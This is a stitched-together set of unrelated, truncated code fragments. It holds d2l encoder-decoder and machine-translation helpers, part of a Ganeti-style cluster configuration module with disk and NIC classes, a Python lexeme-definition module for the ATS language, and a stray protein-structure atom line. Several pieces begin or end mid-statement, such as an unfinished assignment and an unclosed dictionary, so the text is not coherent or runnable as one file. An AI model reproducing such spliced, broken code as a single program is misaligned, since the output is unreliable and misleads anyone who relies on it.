valid_len = (array != vocab.pad).sum(axis=1)
return array, valid_len
# Defined in file: ./chapter_recurrent-neural-networks/machine-translation.md
def load_data_nmt(batch_size, num_steps, num_examples=1000):
text = preprocess_nmt(read_data_nmt())
source, target = tokenize_nmt(text, num_examples)
src_vocab = d2l.Vocab(source, min_freq=3, use_special_tokens=True)
tgt_vocab = d2l.Vocab(target, min_freq=3, use_special_tokens=True)
src_array, src_valid_len = build_array(
source, src_vocab, num_steps, True)
tgt_array, tgt_valid_len = build_array(
target, tgt_vocab, num_steps, False)
data_arrays = (src_array, src_valid_len, tgt_array, tgt_valid_len)
data_iter = d2l.load_array(data_arrays, batch_size)
return src_vocab, tgt_vocab, data_iter
# Defined in file: ./chapter_recurrent-neural-networks/encoder-decoder.md
class Encoder(nn.Block):
"""The base encoder interface for the encoder-decoder architecture."""
def __init__(self, **kwargs):
super(Encoder, self).__init__(**kwargs)
def forward(self, X):
raise NotImplementedError
# Defined in file: ./chapter_recurrent-neural-networks/encoder-decoder.md
class Decoder(nn.Block):
"""The base decoder interface for the encoder-decoder architecture."""
def __init__(self, **kwargs):
super(Decoder, self).__init__(**kwargs)
def init_state(self, enc_outputs, *args):
raise NotImplementedError
def forward(self, X, state):
raise NotImplementedError
# Defined in file: ./chapter_recurrent-neural-networks/encoder-decoder.md
class EncoderDecoder(nn.Block):
"""The base class for the encoder-decoder architecture."""
def __init__(self, encoder, decoder, **kwargs):
super(EncoderDecoder, self).__init__(**kwargs)
self.encoder = encoder
self.decoder = decoder
def forward(self, enc_X, dec_X, *args):
enc_outputs = self.encoder(enc_X, *args)
dec_state = self.decoder.init_state(enc_outputs, *args)
return self.decoder(dec_X, dec_state)
# Defined in file: ./chapter_recurrent-neural-networks/seq2seq.md
class Seq2SeqEncoder(d2l.Encoder):
def __init__(self, vocab_size, embed_size, num_hiddens, | |
def FromDict(cls, val):
"""Custom function for top-level config data
"""
obj = super(ConfigData, cls).FromDict(val)
obj.cluster = Cluster.FromDict(obj.cluster)
obj.nodes = outils.ContainerFromDicts(obj.nodes, dict, Node)
obj.instances = \
outils.ContainerFromDicts(obj.instances, dict, Instance)
obj.nodegroups = \
outils.ContainerFromDicts(obj.nodegroups, dict, NodeGroup)
obj.networks = outils.ContainerFromDicts(obj.networks, dict, Network)
return obj
def HasAnyDiskOfType(self, dev_type):
"""Check if in there is at disk of the given type in the configuration.
@type dev_type: L{constants.DTS_BLOCK}
@param dev_type: the type to look for
@rtype: boolean
@return: boolean indicating if a disk of the given type was found or not
"""
for instance in self.instances.values():
for disk in instance.disks:
if disk.IsBasedOnDiskType(dev_type):
return True
return False
def UpgradeConfig(self):
"""Fill defaults for missing configuration values.
"""
self.cluster.UpgradeConfig()
for node in self.nodes.values():
node.UpgradeConfig()
for instance in self.instances.values():
instance.UpgradeConfig()
self._UpgradeEnabledDiskTemplates()
if self.nodegroups is None:
self.nodegroups = {}
for nodegroup in self.nodegroups.values():
nodegroup.UpgradeConfig()
InstancePolicy.UpgradeDiskTemplates(
nodegroup.ipolicy, self.cluster.enabled_disk_templates)
if self.cluster.drbd_usermode_helper is None:
if self.cluster.IsDiskTemplateEnabled(constants.DT_DRBD8):
self.cluster.drbd_usermode_helper = constants.DEFAULT_DRBD_HELPER
if self.networks is None:
self.networks = {}
for network in self.networks.values():
network.UpgradeConfig()
def _UpgradeEnabledDiskTemplates(self):
"""Upgrade the cluster's enabled disk templates by inspecting the currently
enabled and/or used disk templates.
"""
if not self.cluster.enabled_disk_templates:
template_set = \
set([inst.disk_template for inst in self.instances.values()])
# Add drbd and plain, if lvm is enabled (by specifying a volume group)
if self.cluster.volume_group_name:
template_set.add(constants.DT_DRBD8)
template_set.add(constants.DT_PLAIN)
# Set enabled_disk_templates to the inferred disk templates. Order them
# according to a preference list that is based on Ganeti's history of
# supported disk templates.
self.cluster.enabled_disk_templates = []
for preferred_template in constants.DISK_TEMPLATE_PREFERENCE:
if preferred_template in template_set:
self.cluster.enabled_disk_templates.append(preferred_template)
template_set.remove(preferred_template)
self.cluster.enabled_disk_templates.extend(list(template_set))
InstancePolicy.UpgradeDiskTemplates(
self.cluster.ipolicy, self.cluster.enabled_disk_templates)
class NIC(ConfigObject):
"""Config object representing a network card."""
__slots__ = ["name", "mac", "ip", "network",
"nicparams", "netinfo", "pci"] + _UUID
@classmethod
def CheckParameterSyntax(cls, nicparams):
"""Check the given parameters for validity.
@type nicparams: dict
@param nicparams: dictionary with parameter names/value
@raise errors.ConfigurationError: when a parameter is not valid
"""
mode = nicparams[constants.NIC_MODE]
if (mode not in constants.NIC_VALID_MODES and
mode != constants.VALUE_AUTO):
raise errors.ConfigurationError("Invalid NIC mode '%s'" % mode)
if (mode == constants.NIC_MODE_BRIDGED and
not nicparams[constants.NIC_LINK]):
raise errors.ConfigurationError("Missing bridged NIC link")
class Disk(ConfigObject):
"""Config object representing a block device."""
__slots__ = (["name", "dev_type", "logical_id", "children", "iv_name",
"size", "mode", "params", "spindles", "pci"] + _UUID +
# dynamic_params is special. It depends on the node this instance
# is sent to, and should not be persisted.
["dynamic_params"])
def CreateOnSecondary(self):
"""Test if this device needs to be created on a secondary node."""
return self.dev_type in (constants.DT_DRBD8, constants.DT_PLAIN)
def AssembleOnSecondary(self):
"""Test if this device needs to be assembled on a secondary node."""
return self.dev_type in (constants.DT_DRBD8, constants.DT_PLAIN)
def OpenOnSecondary(self):
"""Test if this device needs to be opened on a secondary node."""
return self.dev_type in (constants.DT_PLAIN,)
def StaticDevPath(self):
"""Return the device path if this device type has a static one.
Some devices (LVM for example) live always at the same /dev/ path,
irrespective of their status. For such devices, we return this
path, for others we return None.
@warning: The path returned is not a normalized pathname; callers
should check that it is a valid path.
"""
if self.dev_type == constants.DT_PLAIN:
return "/dev/%s/%s" % (self.logical_id[0], self.logical_id[1])
elif self.dev_type == constants.DT_BLOCK:
return self.logical_id[1]
elif self.dev_type == constants.DT_RBD:
return "/dev/%s/%s" % (self.logical_id[0], self.logical_id[1])
return None
def ChildrenNeeded(self):
"""Compute the needed number of children for activation.
This method will return either -1 (all children) or a positive
number denoting the minimum number of children needed for
activation (only mirrored devices will usually return >=0).
Currently, only DRBD8 supports diskless activation (therefore we
return 0), for all other we keep the previous semantics and return
-1.
"""
if self.dev_type == constants.DT_DRBD8:
return 0
return -1
def IsBasedOnDiskType(self, dev_type):
"""Check if the disk or its children are based on the given type.
@type dev_type: L{constants.DTS_BLOCK}
@param dev_type: the type to look for
@rtype: boolean
@return: boolean indicating if a device of the given type was found or not
"""
if self.children:
for child in self.children:
if child.IsBasedOnDiskType(dev_type):
return True
return self.dev_type == dev_type
def GetNodes(self, node_uuid):
"""This function returns the nodes this device lives on.
Given the node on which the parent of the device lives on (or, in
case of a top-level device, the primary node of the devices'
instance), this function will return a list of nodes on which this
devices needs to (or can) be assembled.
"""
if self.dev_type in [constants.DT_PLAIN, constants.DT_FILE,
constants.DT_BLOCK, constants.DT_RBD,
constants.DT_EXT, constants.DT_SHARED_FILE]:
result = [node_uuid]
elif self.dev_type in constants.DTS_DRBD:
result = [self.logical_id[0], self.logical_id[1]]
if node_uuid not in result:
raise errors.ConfigurationError("DRBD device passed unknown node")
else:
raise errors.ProgrammerError("Unhandled device type %s" % self.dev_type)
return result
def ComputeNodeTree(self, parent_node_uuid):
"""Compute the node/disk tree for this disk and its children.
This method, given the node on which the parent disk lives, will
return the list of all (node UUID, disk) pairs which describe the disk
tree in the most compact way. For example, a drbd/lvm stack
will be returned as (primary_node, drbd) and (secondary_node, drbd)
which represents all the top-level devices on the nodes.
"""
my_nodes = self.GetNodes(parent_node_uuid)
result = [(node, self) for node in my_nodes]
if not self.children:
# leaf device
return result
for node in my_nodes:
for child in self.children:
child_result = child.ComputeNodeTree(node)
if len(child_result) == 1:
# child (and all its descendants) is simple, doesn't split
# over multiple hosts, so we don't need to describe it, our
# own entry for this node describes it completely
continue
else:
# check if child nodes differ from my nodes; note that
# subdisk can differ from the child itself, and be instead
# one of its descendants
for subnode, subdisk in child_result:
if subnode not in my_nodes:
result.append((subnode, subdisk))
# otherwise child is under our own node, so we ignore this
# entry (but probably the other results in the list will
# be different)
return result
def ComputeGrowth(self, amount):
"""Compute the per-VG growth requirements.
This only works for VG-based disks.
@type amount: integer
@param amount: the desired increase in (user-visible) disk space
@rtype: dict
@return: a dictionary of volume-groups and the required size
"""
if self.dev_type == constants.DT_PLAIN:
return {self.logical_id[0]: amount}
elif self.dev_type == constants.DT_DRBD8:
if self.children:
return self.children[0].ComputeGrowth(amount)
else:
return {}
else:
# Other disk types do not require VG space
return {}
def RecordGrow(self, amount):
"""Update the size of this disk after growth.
This method recurses over the disks's children and updates their
size correspondigly. The method needs to be kept in sync with the
actual algorithms from bdev.
"""
if self.dev_type in (constants.DT_PLAIN, constants.DT_FILE,
constants.DT_RBD, constants.DT_EXT,
constants.DT_SHARED_FILE):
self.size += amount
elif self.dev_type == constants.DT_DRBD8:
if self.children:
self.children[0].RecordGrow(amount)
self.size += amount
else:
raise errors.ProgrammerError("Disk.RecordGrow called for unsupported"
" disk type %s" % self.dev_type)
def Update(self, size=None, mode=None, spindles=None):
"""Apply changes to size, spindles and mode.
"""
if self.dev_type == constants.DT_DRBD8:
if self.children:
self.children[0].Update(size=size, mode=mode)
else:
assert not self.children
if size is not None:
self.size = size
if mode is not None:
self.mode = mode
if spindles is not None:
self.spindles = spindles
def UnsetSize(self):
"""Sets recursively the size to zero for the disk and its children.
"""
if self.children:
for child in self.children:
child.UnsetSize()
self.size = 0
def UpdateDynamicDiskParams(self, target_node_uuid, nodes_ip):
"""Updates the dynamic disk params for the given node.
This is mainly used for drbd, which needs ip/port configuration.
Arguments:
- target_node_uuid: the node UUID we wish to configure for
- nodes_ip: a mapping of node name to ip
The target_node must exist in nodes_ip, and should be one of the
nodes in the logical ID if this device is a DRBD device.
"""
if self.children:
for child in self.children:
child.UpdateDynamicDiskParams(target_node_uuid, nodes_ip)
dyn_disk_params = {}
if self.logical_id is not None and self.dev_type in constants.DTS_DRBD:
pnode_uuid, snode_uuid, _, pminor, sminor, _ = self.logical_id
if target_node_uuid not in (pnode_uuid, snode_uuid):
# disk object is being sent to neither the primary nor the secondary
# node. reset the dynamic parameters, the target node is not
# supposed to use them.
self.dynamic_params | |
""" Lexemes base definitions for the lexemes module. """
from enum import Enum
# Definitions
# ============================================================================
# Characters
# ----------------------------------------------------------------------------
def char_range(first, last):
""" Set of characters first..last. """
return set(chr(c) for c in range(ord(first), ord(last) + 1))
EOF = chr(26)
EOL = "\n"
SPACE = set("\n\r\v\f\t ")
ESCAPED1 = set("ntvbrfa")
ESCAPED2 = set("\\?'\"()[]{}")
ESCAPED = ESCAPED1 | ESCAPED2
OCTAL = char_range("0", "7")
DIGIT = OCTAL | {"8", "9"}
XDIGIT2 = char_range("A", "F")
XDIGIT3 = char_range("a", "f")
XDIGIT = DIGIT | XDIGIT2 | XDIGIT3
IDENTFST1 = char_range("a", "z")
IDENTFST2 = char_range("A", "Z")
IDENTFST3 = {"_"}
IDENTFST = IDENTFST1 | IDENTFST2 | IDENTFST3
IDENTRST3 = {"'", "$"}
IDENTRST = IDENTFST | DIGIT | IDENTRST3
SYMBOLIC = set("%&+-./:=@~`^|*!?<>#")
X = set("xX")
P = set("pP")
E = set("eE")
SIGN = set("-+")
FL = set("fFlL")
LU = set("LlUu")
EXTCODE_TAG = set("#$^")
OTHERS = set("()[]{},;")
# Non‑finals
# ----------------------------------------------------------------------------
class NonFin(Enum):
""" Non‑final lexical products. """
ABSPROP = "ABSPROP"
ABST0YPE = "ABST0YPE"
ABSTYPE = "ABSTYPE"
ABSVIEW = "ABSVIEW"
ABSVIEWT0YPE = "ABSVIEWT0YPE"
ABSVIEWTYPE = "ABSVIEWTYPE"
CASE = "CASE"
CASE_neg = "CASE_neg"
CASE_pos = "CASE_pos"
CASTFN = "CASTFN"
COMMENT_block_c = "COMMENT_block_c"
COMMENT_block_ml = "COMMENT_block_ml"
DATAPROP = "DATAPROP"
DATATYPE = "DATATYPE"
DATAVIEW = "DATAVIEW"
DATAVTYPE = "DATAVTYPE"
DLRDELAY = "DLRDELAY"
DLREFFMASK_ALL = "DLREFFMASK_ALL"
DLREFFMASK_EXN = "DLREFFMASK_EXN"
DLREFFMASK_NTM = "DLREFFMASK_NTM"
DLREFFMASK_REF = "DLREFFMASK_REF"
DLREFFMASK_WRT = "DLREFFMASK_WRT"
DLRLDELAY = "DLRLDELAY"
DLRLST = "DLRLST"
DLRLST_T = "DLRLST_T"
DLRLST_VT = "DLRLST_VT"
DLRREC = "DLRREC"
DLRREC_T = "DLRREC_T"
DLRREC_VT = "DLRREC_VT"
DLRTUP = "DLRTUP"
DLRTUP_T = "DLRTUP_T"
DLRTUP_VT = "DLRTUP_VT"
DLRVCOPYENV_V = "DLRVCOPYENV_V"
DLRVCOPYENV_VT = "DLRVCOPYENV_VT"
FIX = "FIX"
FIXAT = "FIXAT"
FN = "FN"
FNX = "FNX"
FUN = "FUN"
IMPLEMENT = "IMPLEMENT"
IMPLMNT = "IMPLMNT"
INFIX = "INFIX"
INFIXL = "INFIXL"
INFIXR = "INFIXR"
LAM = "LAM"
LAMAT = "LAMAT"
LLAM = "LLAM"
LLAMAT = "LLAMAT"
MACDEF = "MACDEF"
MACRODEF = "MACRODEF"
POSTFIX = "POSTFIX"
PRAXI = "PRAXI"
PREFIX = "PREFIX"
PRFN = "PRFN"
PRFUN = "PRFUN"
PRIMPLMNT = "PRIMPLMNT"
PROP = "PROP"
PROPDEF = "PROPDEF"
PROP_neg = "PROP_neg"
PROP_pos = "PROP_pos"
PRVAL = "PRVAL"
PRVAR = "PRVAR"
T0YPE = "T0YPE"
T0YPE_neg = "T0YPE_neg"
T0YPE_pos = "T0YPE_pos"
TYPE = "TYPE"
TYPEDEF = "TYPEDEF"
TYPE_neg = "TYPE_neg"
TYPE_pos = "TYPE_pos"
VAL = "VAL"
VAL_neg = "VAL_neg"
VAL_pos = "VAL_pos"
VAR = "VAR"
VIEW = "VIEW"
VIEWDEF = "VIEWDEF"
VIEW_neg = "VIEW_neg"
VIEW_pos = "VIEW_pos"
VIEWT0YPE = "VIEWT0YPE"
VIEWT0YPE_neg = "VIEWT0YPE_neg"
VIEWT0YPE_pos = "VIEWT0YPE_pos"
VIEWTYPE = "VIEWTYPE"
VIEWTYPEDEF = "VIEWTYPEDEF"
VIEWTYPE_neg = "VIEWTYPE_neg"
VIEWTYPE_pos = "VIEWTYPE_pos"
WITHPROP = "WITHPROP"
WITHTYPE = "WITHTYPE"
WITHVIEW = "WITHVIEW"
WITHVIEWTYPE = "WITHVIEWTYPE"
# Finals
# ----------------------------------------------------------------------------
class Fin(Enum):
""" Final lexical products. """
T_ABSTYPE = "T_ABSTYPE"
T_ADDRAT = "T_ADDRAT"
T_ADDR_OR_IDENT = "T_ADDR_OR_IDENT" # Renamed
T_AND = "T_AND"
T_ASSUME = "T_ASSUME"
T_AS = "T_AS"
T_ATLBRACE = "T_ATLBRACE"
T_ATLBRACKET = "T_ATLBRACKET"
T_ATLPAREN = "T_ATLPAREN"
T_AT_OR_SIDENT = "T_AT_OR_SIDENT" # Renamed
T_BACKSLASH_OR_IDENT = "T_BACKSLASH_OR_IDENT" # Renamed
T_BANG_OR_IDENT = "T_BANG_OR_IDENT" # Renamed
T_BAR = "T_BAR"
T_BEGIN = "T_BEGIN"
T_BQUOTELPAREN = "T_BQUOTELPAREN"
T_BQUOTE = "T_BQUOTE"
T_CASE = "T_CASE"
T_CHAR = "T_CHAR"
T_CLASSDEC = "T_CLASSDEC"
T_COLONLT = "T_COLONLT"
T_COLON = "T_COLON"
T_COMMALPAREN = "T_COMMALPAREN"
T_COMMA = "T_COMMA"
T_COMMENT_block = "T_COMMENT_block"
T_COMMENT_line = "T_COMMENT_line"
T_COMMENT_rest = "T_COMMENT_rest"
T_DATASORT = "T_DATASORT"
T_DATATYPE = "T_DATATYPE"
T_DLRARRPSZ = "T_DLRARRPSZ"
T_DLRBREAK = "T_DLRBREAK"
T_DLRCONTINUE = "T_DLRCONTINUE"
T_DLRD2CTYPE = "T_DLRD2CTYPE"
T_DLRDELAY = "T_DLRDELAY"
T_DLREFFMASK_ARG = "T_DLREFFMASK_ARG"
T_DLREFFMASK = "T_DLREFFMASK"
T_DLREXTERN = "T_DLREXTERN"
T_DLREXTFCALL = "T_DLREXTFCALL"
T_DLREXTKIND = "T_DLREXTKIND"
T_DLREXTMCALL = "T_DLREXTMCALL"
T_DLREXTVAL = "T_DLREXTVAL"
T_DLREXTYPE_STRUCT = "T_DLREXTYPE_STRUCT"
T_DLREXTYPE = "T_DLREXTYPE"
T_DLRLITERAL = "T_DLRLITERAL"
T_DLRLST = "T_DLRLST"
T_DLRMYFILENAME = "T_DLRMYFILENAME"
T_DLRMYFUNCTION = "T_DLRMYFUNCTION"
T_DLRMYLOCATION = "T_DLRMYLOCATION"
T_DLRRAISE = "T_DLRRAISE"
T_DLRREC = "T_DLRREC"
T_DLRSHOWTYPE = "T_DLRSHOWTYPE"
T_DLRSOLASSERT = "T_DLRSOLASSERT"
T_DLRSOLVERIFY = "T_DLRSOLVERIFY"
T_DLRTEMPENVER = "T_DLRTEMPENVER"
T_DLRTUP = "T_DLRTUP"
T_DLRTYREP = "T_DLRTYREP"
T_DLRVARARG = "T_DLRVARARG"
T_DLRVCOPYENV = "T_DLRVCOPYENV"
T_DOLLAR = "T_DOLLAR"
T_DO = "T_DO"
T_DOTDOTDOT = "T_DOTDOTDOT"
T_DOTDOT = "T_DOTDOT"
T_DOTINT = "T_DOTINT"
T_DOTLTGTDOT = "T_DOTLTGTDOT"
T_DOTLT = "T_DOTLT"
T_DOT = "T_DOT"
T_ELSE = "T_ELSE"
T_END = "T_END"
T_EOF = "T_EOF"
T_EQGTGT = "T_EQGTGT"
T_EQGT = "T_EQGT"
T_EQLTGT = "T_EQLTGT"
T_EQLT = "T_EQLT"
T_EQSLASHEQGTGT = "T_EQSLASHEQGTGT"
T_EQSLASHEQGT = "T_EQSLASHEQGT"
T_EQ_OR_DIDENT = "T_EQ_OR_DIDENT" # Renamed
T_ERR = "T_ERR"
T_EXCEPTION = "T_EXCEPTION"
T_EXTCODE = "T_EXTCODE"
T_EXTERN = "T_EXTERN"
T_EXTVAR = "T_EXTVAR"
T_EXTYPE = "T_EXTYPE"
T_FIXITY = "T_FIXITY"
T_FIX = "T_FIX"
T_FLOAT = "T_FLOAT"
T_FOLDAT = "T_FOLDAT"
T_FOLD_OR_IDENT = "T_FOLD_OR_IDENT" # Renamed
T_FORSTAR = "T_FORSTAR"
T_FOR = "T_FOR"
T_FREEAT = "T_FREEAT"
T_FREE_OR_IDENT = "T_FREE_OR_IDENT" # Renamed
T_FUN = "T_FUN"
T_GTDOT = "T_GTDOT"
T_GTLT_OR_DIDENT = "T_GTLT_OR_DIDENT" # Renamed
T_GT_OR_IDENT = "T_GT_OR_IDENT" # Renamed
T_HASHLBRACKET = "T_HASHLBRACKET"
T_HASH = "T_HASH"
T_IDENT_alp = "T_IDENT_alp"
T_IDENT_arr = "T_IDENT_arr"
T_IDENT_dlr = "T_IDENT_dlr"
T_IDENT_ext = "T_IDENT_ext"
T_IDENT_srp = "T_IDENT_srp"
T_IDENT_sym = "T_IDENT_sym"
T_IDENT_tmp = "T_IDENT_tmp"
T_IFCASE = "T_IFCASE"
T_IF = "T_IF"
T_IMPLEMENT = "T_IMPLEMENT"
T_IMPORT = "T_IMPORT"
T_INT = "T_INT"
T_IN = "T_IN"
T_INTZERO = "T_INTZERO"
T_LAM = "T_LAM"
T_LBRACE = "T_LBRACE"
T_LBRACKET = "T_LBRACKET"
T_LET = "T_LET"
T_LOCAL = "T_LOCAL"
T_LPAREN = "T_LPAREN"
T_LT_OR_IDENT = "T_LT_OR_IDENT" # Renamed
T_MACDEF = "T_MACDEF"
T_MINUSGT_OR_SIDENT = "T_MINUSGT_OR_SIDENT" # Renamed
T_MINUSLTGT = "T_MINUSLTGT"
T_MINUSLT = "T_MINUSLT"
T_NONFIX = "T_NONFIX"
T_OF = "T_OF"
T_OP = "T_OP"
T_OVERLOAD = "T_OVERLOAD"
T_PERCENTLPAREN = "T_PERCENTLPAREN"
T_PERCENT_OR_IDENT = "T_PERCENT_OR_IDENT" # Renamed
T_QMARK_OR_IDENT = "T_QMARK_OR_IDENT" # Renamed
T_QUOTELBRACE = "T_QUOTELBRACE"
T_QUOTELBRACKET = "T_QUOTELBRACKET"
T_QUOTELPAREN = "T_QUOTELPAREN"
T_RBRACE = "T_RBRACE"
T_RBRACKET = "T_RBRACKET"
T_REASSUME = "T_REASSUME"
T_REC = "T_REC"
T_RPAREN = "T_RPAREN"
T_SCASE = "T_SCASE"
T_SEMICOLON = "T_SEMICOLON"
T_SIF = "T_SIF"
T_SORTDEF = "T_SORTDEF"
T_SPACE = "T_SPACE"
T_SRPASSERT = "T_SRPASSERT"
T_SRPCODEGEN2 = "T_SRPCODEGEN2"
T_SRPDEFINE = "T_SRPDEFINE"
T_SRPDYNLOAD = "T_SRPDYNLOAD"
T_SRPELIFDEF = "T_SRPELIFDEF"
T_SRPELIFNDEF = "T_SRPELIFNDEF"
T_SRPELIF = "T_SRPELIF"
T_SRPELSE = "T_SRPELSE"
T_SRPENDIF = "T_SRPENDIF"
T_SRPERROR = "T_SRPERROR"
T_SRPIFDEF = "T_SRPIFDEF"
T_SRPIFNDEF = "T_SRPIFNDEF"
T_SRPIF = "T_SRPIF"
T_SRPINCLUDE = "T_SRPINCLUDE"
T_SRPPRAGMA = "T_SRPPRAGMA"
T_SRPPRERR = "T_SRPPRERR"
T_SRPPRINT = "T_SRPPRINT"
T_SRPREQUIRE = "T_SRPREQUIRE"
T_SRPSTALOAD = "T_SRPSTALOAD"
T_SRPTHEN = "T_SRPTHEN"
T_SRPUNDEF = "T_SRPUNDEF"
T_STACST = "T_STACST"
T_STADEF = "T_STADEF"
T_STATIC = "T_STATIC"
T_STRING = "T_STRING"
T_SYMELIM = "T_SYMELIM"
T_SYMINTR = "T_SYMINTR"
T_THEN = "T_THEN"
T_TILDE_OR_IDENT = "T_TILDE_OR_IDENT" # Renamed
T_TKINDEF = "T_TKINDEF"
T_TRY = "T_TRY"
T_TYPEDEF = "T_TYPEDEF"
T_TYPE = "T_TYPE"
T_TYPE_OR_IDENT = "T_TYPE_OR_IDENT" # Added
T_VAL = "T_VAL"
T_VAR = "T_VAR"
T_VIEWAT = "T_VIEWAT"
T_WHEN = "T_WHEN"
T_WHERE = "T_WHERE"
T_WHILESTAR = "T_WHILESTAR"
T_WHILE = "T_WHILE"
T_WITH = "T_WITH"
T_WITHTYPE = "T_WITHTYPE"
# Translation of non‑finals to finals
# ----------------------------------------------------------------------------
NONFINS_TRANSL = {
NonFin.ABSPROP: Fin.T_ABSTYPE,
NonFin.ABST0YPE: Fin.T_ABSTYPE,
NonFin.ABSTYPE: Fin.T_ABSTYPE,
NonFin.ABSVIEWT0YPE: Fin.T_ABSTYPE,
NonFin.ABSVIEW: Fin.T_ABSTYPE,
NonFin.ABSVIEWTYPE: Fin.T_ABSTYPE,
NonFin.CASE_neg: Fin.T_CASE,
NonFin.CASE_pos: Fin.T_CASE,
NonFin.CASE: Fin.T_CASE,
NonFin.CASTFN: Fin.T_FUN,
NonFin.COMMENT_block_c: Fin.T_COMMENT_block,
NonFin.COMMENT_block_ml: Fin.T_COMMENT_block,
NonFin.DATAPROP: Fin.T_DATATYPE,
NonFin.DATATYPE: Fin.T_DATATYPE,
NonFin.DATAVIEW: Fin.T_DATATYPE,
NonFin.DATAVTYPE: Fin.T_DATATYPE,
NonFin.DLRDELAY: Fin.T_DLRDELAY,
NonFin.DLREFFMASK_ALL: Fin.T_DLREFFMASK_ARG,
NonFin.DLREFFMASK_EXN: Fin.T_DLREFFMASK_ARG,
NonFin.DLREFFMASK_NTM: Fin.T_DLREFFMASK_ARG,
NonFin.DLREFFMASK_REF: Fin.T_DLREFFMASK_ARG,
NonFin.DLREFFMASK_WRT: Fin.T_DLREFFMASK_ARG,
NonFin.DLRLDELAY: Fin.T_DLRDELAY,
NonFin.DLRLST: Fin.T_DLRLST,
NonFin.DLRLST_T: Fin.T_DLRLST,
NonFin.DLRLST_VT: Fin.T_DLRLST,
NonFin.DLRREC: Fin.T_DLRREC,
NonFin.DLRREC_T: Fin.T_DLRREC,
NonFin.DLRREC_VT: Fin.T_DLRREC,
NonFin.DLRTUP: Fin.T_DLRTUP,
NonFin.DLRTUP_T: Fin.T_DLRTUP,
NonFin.DLRTUP_VT: Fin.T_DLRTUP,
NonFin.DLRVCOPYENV_V: Fin.T_DLRVCOPYENV,
NonFin.DLRVCOPYENV_VT: Fin.T_DLRVCOPYENV,
NonFin.FIXAT: Fin.T_FIX,
NonFin.FIX: Fin.T_FIX,
NonFin.FN: Fin.T_FUN,
NonFin.FNX: Fin.T_FUN,
NonFin.FUN: Fin.T_FUN,
NonFin.IMPLEMENT: Fin.T_IMPLEMENT,
NonFin.IMPLMNT: Fin.T_IMPLEMENT,
NonFin.INFIXL: Fin.T_FIXITY,
NonFin.INFIXR: Fin.T_FIXITY,
NonFin.INFIX: Fin.T_FIXITY,
NonFin.LAMAT: Fin.T_LAM,
NonFin.LAM: Fin.T_LAM,
NonFin.LLAMAT: Fin.T_LAM,
NonFin.LLAM: Fin.T_LAM,
NonFin.MACDEF: Fin.T_MACDEF,
NonFin.MACRODEF: Fin.T_MACDEF,
NonFin.POSTFIX: Fin.T_FIXITY,
NonFin.PRAXI: Fin.T_FUN,
NonFin.PREFIX: Fin.T_FIXITY,
NonFin.PRFN: Fin.T_FUN,
NonFin.PRFUN: Fin.T_FUN,
NonFin.PRIMPLMNT: Fin.T_IMPLEMENT,
NonFin.PROPDEF: Fin.T_TYPEDEF,
NonFin.PROP_neg: Fin.T_TYPE,
NonFin.PROP_pos: Fin.T_TYPE,
NonFin.PROP: Fin.T_TYPE_OR_IDENT,
NonFin.PRVAL: Fin.T_VAL,
NonFin.PRVAR: Fin.T_VAR,
NonFin.T0YPE_neg: Fin.T_TYPE,
NonFin.T0YPE_pos: Fin.T_TYPE,
NonFin.T0YPE: Fin.T_TYPE,
NonFin.TYPEDEF: Fin.T_TYPEDEF,
NonFin.TYPE_neg: Fin.T_TYPE,
NonFin.TYPE_pos: Fin.T_TYPE,
NonFin.TYPE: Fin.T_TYPE_OR_IDENT,
NonFin.VAL_neg: Fin.T_VAL,
NonFin.VAL_pos: Fin.T_VAL,
NonFin.VAL: Fin.T_VAL,
NonFin.VAR: Fin.T_VAR,
NonFin.VIEWDEF: Fin.T_TYPEDEF,
NonFin.VIEW_neg: Fin.T_TYPE,
NonFin.VIEW_pos: Fin.T_TYPE,
NonFin.VIEWT0YPE_neg: Fin.T_TYPE,
NonFin.VIEWT0YPE_pos: Fin.T_TYPE,
NonFin.VIEWT0YPE: Fin.T_TYPE,
NonFin.VIEW: Fin.T_TYPE_OR_IDENT,
NonFin.VIEWTYPEDEF: Fin.T_TYPEDEF,
NonFin.VIEWTYPE_neg: Fin.T_TYPE,
NonFin.VIEWTYPE_pos: Fin.T_TYPE,
NonFin.VIEWTYPE: Fin.T_TYPE_OR_IDENT,
NonFin.WITHPROP: Fin.T_WITHTYPE,
NonFin.WITHTYPE: Fin.T_WITHTYPE,
NonFin.WITHVIEW: Fin.T_WITHTYPE,
NonFin.WITHVIEWTYPE: Fin.T_WITHTYPE}
assert all(isinstance(x, NonFin) for x in NONFINS_TRANSL)
assert all(isinstance(x, Fin) for x in NONFINS_TRANSL.values())
assert all(x in NONFINS_TRANSL for x in NonFin)
# Translation of some idents to products
# ----------------------------------------------------------------------------
IDENTS_TRANSL = {
# Finals
"and": Fin.T_AND,
"as": Fin.T_AS,
"assume": Fin.T_ASSUME,
"absimpl": Fin.T_ASSUME,
"@": Fin.T_AT_OR_SIDENT,
"!": Fin.T_BANG_OR_IDENT,
"|": Fin.T_BAR,
"begin": Fin.T_BEGIN,
"`": Fin.T_BQUOTE,
"classdec": Fin.T_CLASSDEC,
":": Fin.T_COLON,
"datasort": Fin.T_DATASORT,
"$arrpsz": Fin.T_DLRARRPSZ,
"$arrptrsize": Fin.T_DLRARRPSZ,
"$break": Fin.T_DLRBREAK,
"$continue": Fin.T_DLRCONTINUE,
"$d2ctype": Fin.T_DLRD2CTYPE,
"$effmask": Fin.T_DLREFFMASK,
"$extern": Fin.T_DLREXTERN,
"$extfcall": Fin.T_DLREXTFCALL,
"$extkind": Fin.T_DLREXTKIND,
"$extmcall": Fin.T_DLREXTMCALL,
"$extval": Fin.T_DLREXTVAL,
"$extype": Fin.T_DLREXTYPE,
"$extype_struct": Fin.T_DLREXTYPE_STRUCT,
"$literal": Fin.T_DLRLITERAL,
"$myfilename": Fin.T_DLRMYFILENAME,
"$myfunction": Fin.T_DLRMYFUNCTION,
"$mylocation": Fin.T_DLRMYLOCATION,
"$raise": Fin.T_DLRRAISE,
"$showtype": Fin.T_DLRSHOWTYPE,
"$solver_assert": Fin.T_DLRSOLASSERT,
"$solver_verify": Fin.T_DLRSOLVERIFY,
"$tempenver": Fin.T_DLRTEMPENVER,
"$tyrep": Fin.T_DLRTYREP,
"$vararg": Fin.T_DLRVARARG,
"do": Fin.T_DO,
"$": Fin.T_DOLLAR,
".": Fin.T_DOT,
"..": Fin.T_DOTDOT,
"...": Fin.T_DOTDOTDOT,
".<>.": Fin.T_DOTLTGTDOT,
".<": Fin.T_DOTLT,
"else": Fin.T_ELSE,
"end": Fin.T_END,
"=": Fin.T_EQ_OR_DIDENT,
"=>": Fin.T_EQGT,
"=>>": | |
ASN B 1 131 ? 65.744 -30.604 10.789 1.00 18.90 ? 132 ASN B ND2 1
